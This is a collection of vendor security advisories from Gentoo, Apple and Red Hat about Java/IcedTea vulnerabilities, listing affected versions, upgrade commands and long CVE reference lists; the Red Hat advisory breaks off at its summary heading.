We recommend that you upgrade your openjdk-6 packages. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201406-32
http://security.gentoo.org/
Severity: High Title: IcedTea JDK: Multiple vulnerabilities Date: June 29, 2014 Bugs: #312297, #330205, #340819, #346799, #352035, #353418, #354231, #355127, #370787, #387637, #404095, #421031, #429522, #433389, #438750, #442478, #457206, #458410, #461714, #466822, #477210, #489570, #508270 ID: 201406-32
Synopsis
Multiple vulnerabilities have been found in the IcedTea JDK, the worst of which could lead to arbitrary code execution.
Background
IcedTea is a distribution of the Java OpenJDK source code built with free build tools.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/icedtea-bin < 6.1.13.3 >= 6.1.13.3
Description
Multiple vulnerabilities have been discovered in the IcedTea JDK. Please review the CVE identifiers referenced below for details.
Impact
A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, bypass intended security policies, or have other unspecified impact.
Workaround
There is no known workaround at this time.
Resolution
All IcedTea JDK users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-java/icedtea-bin-6.1.13.3"
References
[ 1 ] CVE-2009-3555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555 [ 2 ] CVE-2010-2548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2548 [ 3 ] CVE-2010-2783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2783 [ 4 ] CVE-2010-3541 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541 [ 5 ] CVE-2010-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548 [ 6 ] CVE-2010-3549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549 [ 7 ] CVE-2010-3551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551 [ 8 ] CVE-2010-3553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553 [ 9 ] CVE-2010-3554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554 [ 10 ] CVE-2010-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557 [ 11 ] CVE-2010-3561 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561 [ 12 ] CVE-2010-3562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562 [ 13 ] CVE-2010-3564 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3564 [ 14 ] CVE-2010-3565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565 [ 15 ] CVE-2010-3566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566 [ 16 ] CVE-2010-3567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567 [ 17 ] CVE-2010-3568 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568 [ 18 ] CVE-2010-3569 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569 [ 19 ] CVE-2010-3573 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573 [ 20 ] CVE-2010-3574 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574 [ 21 ] CVE-2010-3860 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3860 [ 22 ] CVE-2010-4351 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4351 [ 23 ] CVE-2010-4448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448 [ 24 ] CVE-2010-4450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450 [ 25 ] CVE-2010-4465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465 [ 26 ] CVE-2010-4467 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467 [ 27 ] CVE-2010-4469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469 [ 28 ] CVE-2010-4470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470 [ 29 ] CVE-2010-4471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471 [ 30 ] CVE-2010-4472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472 [ 31 ] CVE-2010-4476 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476 [ 32 ] CVE-2011-0025 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0025 [ 33 ] CVE-2011-0706 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0706 [ 34 ] CVE-2011-0815 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815 [ 35 ] CVE-2011-0822 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0822 [ 36 ] CVE-2011-0862 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862 [ 37 ] CVE-2011-0864 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864 [ 38 ] CVE-2011-0865 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865 [ 39 ] CVE-2011-0868 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868 [ 40 ] CVE-2011-0869 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869 [ 41 ] CVE-2011-0870 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0870 [ 42 ] CVE-2011-0871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871 [ 43 ] CVE-2011-0872 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872 [ 44 ] CVE-2011-3389 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389 [ 45 ] CVE-2011-3521 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521 [ 46 ] CVE-2011-3544 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544 [ 47 ] CVE-2011-3547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547 [ 48 ] CVE-2011-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548 [ 49 ] CVE-2011-3551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551 [ 50 ] CVE-2011-3552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552 [ 51 ] CVE-2011-3553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553 [ 52 ] CVE-2011-3554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554 [ 53 ] CVE-2011-3556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556 [ 54 ] CVE-2011-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557 [ 55 ] CVE-2011-3558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558 [ 56 ] CVE-2011-3560 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560 [ 57 ] CVE-2011-3563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563 [ 58 ] CVE-2011-3571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3571 [ 59 ] CVE-2011-5035 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035 [ 60 ] CVE-2012-0497 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497 [ 61 ] CVE-2012-0501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501 [ 62 ] CVE-2012-0502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502 [ 63 ] CVE-2012-0503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503 [ 64 ] CVE-2012-0505 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505 [ 65 ] CVE-2012-0506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506 [ 66 ] CVE-2012-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547 [ 67 ] CVE-2012-1711 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711 [ 68 ] CVE-2012-1713 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713 [ 69 ] CVE-2012-1716 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716 [ 70 ] CVE-2012-1717 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717 [ 71 ] CVE-2012-1718 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718 [ 72 ] CVE-2012-1719 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719 [ 73 ] CVE-2012-1723 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723 [ 74 ] CVE-2012-1724 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724 [ 75 ] CVE-2012-1725 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725 [ 76 ] CVE-2012-1726 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726 [ 77 ] CVE-2012-3216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216 [ 78 ] CVE-2012-3422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3422 [ 79 ] CVE-2012-3423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3423 [ 80 ] CVE-2012-4416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416 [ 81 ] CVE-2012-4540 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4540 [ 82 ] CVE-2012-5068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068 [ 83 ] CVE-2012-5069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069 [ 84 ] CVE-2012-5070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070 [ 85 ] CVE-2012-5071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071 [ 86 ] CVE-2012-5072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072 [ 87 ] CVE-2012-5073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073 [ 88 ] CVE-2012-5074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074 [ 89 ] CVE-2012-5075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075 [ 90 ] CVE-2012-5076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076 [ 91 ] CVE-2012-5077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077 [ 92 ] CVE-2012-5081 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081 [ 93 ] CVE-2012-5084 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084 [ 94 ] CVE-2012-5085 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085 [ 95 ] CVE-2012-5086 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086 [ 96 ] CVE-2012-5087 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087 [ 97 ] CVE-2012-5089 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089 [ 98 ] CVE-2012-5979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5979 [ 99 ] CVE-2013-0169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169 [ 100 ] CVE-2013-0401 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401 [ 101 ] CVE-2013-0424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0424 [ 102 ] CVE-2013-0425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0425 [ 103 ] CVE-2013-0426 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0426 [ 104 ] CVE-2013-0427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0427 [ 105 ] CVE-2013-0428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0428 [ 106 ] CVE-2013-0429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0429 [ 107 ] CVE-2013-0431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0431 [ 108 ] CVE-2013-0432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0432 [ 109 ] CVE-2013-0433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0433 [ 110 ] CVE-2013-0434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0434 [ 111 ] CVE-2013-0435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0435 [ 112 ] CVE-2013-0440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0440 [ 113 ] CVE-2013-0441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0441 [ 114 ] CVE-2013-0442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0442 [ 115 ] CVE-2013-0443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0443 [ 116 ] CVE-2013-0444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0444 [ 117 ] CVE-2013-0450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0450 [ 118 ] CVE-2013-0809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809 [ 119 ] CVE-2013-1475 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1475 [ 120 ] CVE-2013-1476 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1476 [ 121 ] CVE-2013-1478 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1478 [ 122 ] CVE-2013-1480 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1480 [ 123 ] CVE-2013-1484 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484 [ 124 ] CVE-2013-1485 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485 [ 125 ] CVE-2013-1486 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486 [ 126 ] CVE-2013-1488 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488 [ 127 ] CVE-2013-1493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493 [ 128 ] CVE-2013-1500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500 [ 129 ] CVE-2013-1518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518 [ 130 ] CVE-2013-1537 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537 [ 131 ] CVE-2013-1557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557 [ 132 ] CVE-2013-1569 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569 [ 133 ] CVE-2013-1571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571 [ 134 ] CVE-2013-2383 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383 [ 135 ] CVE-2013-2384 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384 [ 136 ] CVE-2013-2407 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407 [ 137 ] CVE-2013-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412 [ 138 ] CVE-2013-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415 [ 139 ] CVE-2013-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417 [ 140 ] CVE-2013-2419 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419 [ 141 ] CVE-2013-2420 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420 [ 142 ] CVE-2013-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421 [ 143 ] CVE-2013-2422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422 [ 144 ] CVE-2013-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423 [ 145 ] CVE-2013-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424 [ 146 ] CVE-2013-2426 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426 [ 147 ] CVE-2013-2429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429 [ 148 ] CVE-2013-2430 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430 [ 149 ] CVE-2013-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431 [ 150 ] CVE-2013-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436 [ 151 ] CVE-2013-2443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443 [ 152 ] CVE-2013-2444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444 [ 153 ] CVE-2013-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445 [ 154 ] CVE-2013-2446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446 [ 155 ] CVE-2013-2447 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447 [ 156 ] CVE-2013-2448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448 [ 157 ] CVE-2013-2449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449 [ 158 ] CVE-2013-2450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450 [ 159 ] CVE-2013-2451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451 [ 160 ] CVE-2013-2452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452 [ 161 ] CVE-2013-2453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453 [ 162 ] CVE-2013-2454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454 [ 163 ] CVE-2013-2455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455 [ 164 ] CVE-2013-2456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456 [ 165 ] CVE-2013-2457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457 [ 166 ] CVE-2013-2458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458 [ 167 ] CVE-2013-2459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459 [ 168 ] CVE-2013-2460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460 [ 169 ] CVE-2013-2461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461 [ 170 ] CVE-2013-2463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463 [ 171 ] CVE-2013-2465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465 [ 172 ] CVE-2013-2469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469 [ 173 ] CVE-2013-2470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470 [ 174 ] CVE-2013-2471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471 [ 175 ] CVE-2013-2472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472 [ 176 ] CVE-2013-2473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473 [ 177 ] CVE-2013-3829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829 [ 178 ] CVE-2013-4002 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4002 [ 179 ] CVE-2013-5772 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772 [ 180 ] CVE-2013-5774 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774 [ 181 ] CVE-2013-5778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778 [ 182 ] CVE-2013-5780 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780 [ 183 ] CVE-2013-5782 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782 [ 184 ] CVE-2013-5783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783 [ 185 ] CVE-2013-5784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784 [ 186 ] CVE-2013-5790 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790 [ 187 ] CVE-2013-5797 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797 [ 188 ] CVE-2013-5800 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800 [ 189 ] CVE-2013-5802 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802 [ 190 ] CVE-2013-5803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803 [ 191 ] CVE-2013-5804 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804 [ 192 ] CVE-2013-5805 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805 [ 193 ] CVE-2013-5806 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806 [ 194 ] CVE-2013-5809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809 [ 195 ] CVE-2013-5814 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814 [ 196 ] CVE-2013-5817 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817 [ 197 ] CVE-2013-5820 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820 [ 198 ] CVE-2013-5823 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823 [ 199 ] CVE-2013-5825 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825 [ 200 ] CVE-2013-5829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829 [ 201 ] CVE-2013-5830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830 [ 202 ] CVE-2013-5840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840 [ 203 ] CVE-2013-5842 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842 [ 204 ] CVE-2013-5849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849 [ 205 ] CVE-2013-5850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850 [ 206 ] CVE-2013-5851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851 [ 207 ] CVE-2013-6629 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6629 [ 208 ] CVE-2013-6954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6954 [ 209 ] CVE-2014-0429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429 [ 210 ] CVE-2014-0446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446 [ 211 ] CVE-2014-0451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451 [ 212 ] CVE-2014-0452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452 [ 213 ] CVE-2014-0453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453 [ 214 ] CVE-2014-0456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456 [ 215 ] CVE-2014-0457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457 [ 216 ] CVE-2014-0458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458 [ 217 ] CVE-2014-0459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459 [ 218 ] CVE-2014-0460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460 [ 219 ] CVE-2014-0461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461 [ 220 ] CVE-2014-1876 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1876 [ 221 ] CVE-2014-2397 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397 [ 222 ] CVE-2014-2398 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398 [ 223 ] CVE-2014-2403 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403 [ 224 ] CVE-2014-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412 [ 225 ] CVE-2014-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414 [ 226 ] CVE-2014-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421 [ 227 ] CVE-2014-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423 [ 228 ] CVE-2014-2427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201406-32.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
APPLE-SA-2013-06-18-1 Java for OS X 2013-004 and Mac OS X v10.6 Update 16
Java for OS X 2013-004 and Mac OS X v10.6 Update 16 is now available and addresses the following:
Java Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 or later, OS X Lion Server v10.7 or later, OS X Mountain Lion 10.8 or later Impact: Multiple vulnerabilities in Java 1.6.0_45 Description: 8011782 Multiple vulnerabilities existed in Java 1.6.0_45, the most serious of which may allow an untrusted Java applet to execute arbitrary code outside the Java sandbox. Visiting a web page containing a maliciously crafted untrusted Java applet may lead to arbitrary code execution with the privileges of the current user. These issues were addressed by updating to Java version 1.6.0_51. Further information is available via the Java website at ht tp://www.oracle.com/technetwork/java/javase/releasenotes-136954.html CVE-ID CVE-2013-1500 CVE-2013-1571 CVE-2013-2407 CVE-2013-2412 CVE-2013-2437 CVE-2013-2442 CVE-2013-2443 CVE-2013-2444 CVE-2013-2445 CVE-2013-2446 CVE-2013-2447 CVE-2013-2448 CVE-2013-2450 CVE-2013-2451 CVE-2013-2452 CVE-2013-2453 CVE-2013-2454 CVE-2013-2455 CVE-2013-2456 CVE-2013-2457 CVE-2013-2459 CVE-2013-2461 CVE-2013-2463 CVE-2013-2464 CVE-2013-2465 CVE-2013-2466 CVE-2013-2468 CVE-2013-2469 CVE-2013-2470 CVE-2013-2471 CVE-2013-2472 CVE-2013-2473 CVE-2013-3743 CVE_2013-2445
Java for OS X 2013-004 and Mac OS X v10.6 Update 16 may be obtained from the Software Update pane in System Preferences, Mac App Store, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
For Mac OS X v10.6 systems The download file is named: JavaForMacOSX10.6.Update16.dmg Its SHA-1 digest is: a6b5a9caa3c0d9acf743da8e4c0e5cfe4e471b01
For OS X Lion and Mountain Lion systems The download file is named: JavaForOSX2013-004.dmg Its SHA-1 digest is: 153c3f74d5285d10008fce2004d904da8d2ffdff
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJRwL5AAAoJEPefwLHPlZEwju0QALM1IST/ATt2xR1L0AQcaZRX eiM07MlvAlE9Jv45xqKLUezRU8XQT6+glN51/hBhpyCa8MJIzPiSnnOIAW+vbA5o RjXQTGPGT1IPSfEk7OWS++566riMLmTOvg45Qn0E/ibOqJHpfrR4wzQX5jpv7lzH EbdKxn+KWfHCF2y/2LCFifDHUBPCjUlbWTRznDCYVHsFbtDiP/vAZiSXsNJtLTXK UOD/eGbel2PEqWOOsUNIrzwvztRB+LsYT4xKQQnsEKJqoyMch/UgB1Uo2jgEPn0U YP3WZbjbDV+UcM+yMoCV/qDFhbJ+qBxTbuwYOHuSDpgqJ7vF8s0cdUUb6U7QLW4/ 3ykC7vOUS/JqYkiqwUxuKVpzSUYXrlez36sQuwCR9AOGCJ/0/MwM8QPavFAdGisP 36ZavJ4k2Dp2CfVmWjexpWY7XN9M36Lh57XChxQk9TcbjUJRrqNadlPyzaja3G9a 95Dq1N1dYfLuFm4MtyeDA0xQl8m8ljnSxH3TQoDcTwvvWGIGdG7EEVpdQqM/MTWY CY2EqMkY3Gouet+QvECYwxOz+g0hcaJd973kSM+5AJ7tVfod93NDW3P13k2cfdTC uo9IgGkhuNY40NuLpJLtTwlHcTCwBtKPt0BLwXugZdoDrgz1j8Q+fLuASSTkUQxl 3t9MUCG40o5ZQFyWqV1+ =zFXN -----END PGP SIGNATURE----- . In a typical operating environment, these are of low security risk as the runtime is not used on untrusted applets. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Critical: java-1.7.0-oracle security update Advisory ID: RHSA-2013:0963-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0963.html Issue date: 2013-06-20 CVE Names: CVE-2013-1500 CVE-2013-1571 CVE-2013-2400 CVE-2013-2407 CVE-2013-2412 CVE-2013-2437 CVE-2013-2442 CVE-2013-2443 CVE-2013-2444 CVE-2013-2445 CVE-2013-2446 CVE-2013-2447 CVE-2013-2448 CVE-2013-2449 CVE-2013-2450 CVE-2013-2451 CVE-2013-2452 CVE-2013-2453 CVE-2013-2454 CVE-2013-2455 CVE-2013-2456 CVE-2013-2457 CVE-2013-2458 CVE-2013-2459 CVE-2013-2460 CVE-2013-2461 CVE-2013-2462 CVE-2013-2463 CVE-2013-2464 CVE-2013-2465 CVE-2013-2466 CVE-2013-2468 CVE-2013-2469 CVE-2013-2470 CVE-2013-2471 CVE-2013-2472 CVE-2013-2473 CVE-2013-3744 =====================================================================
- Summary:
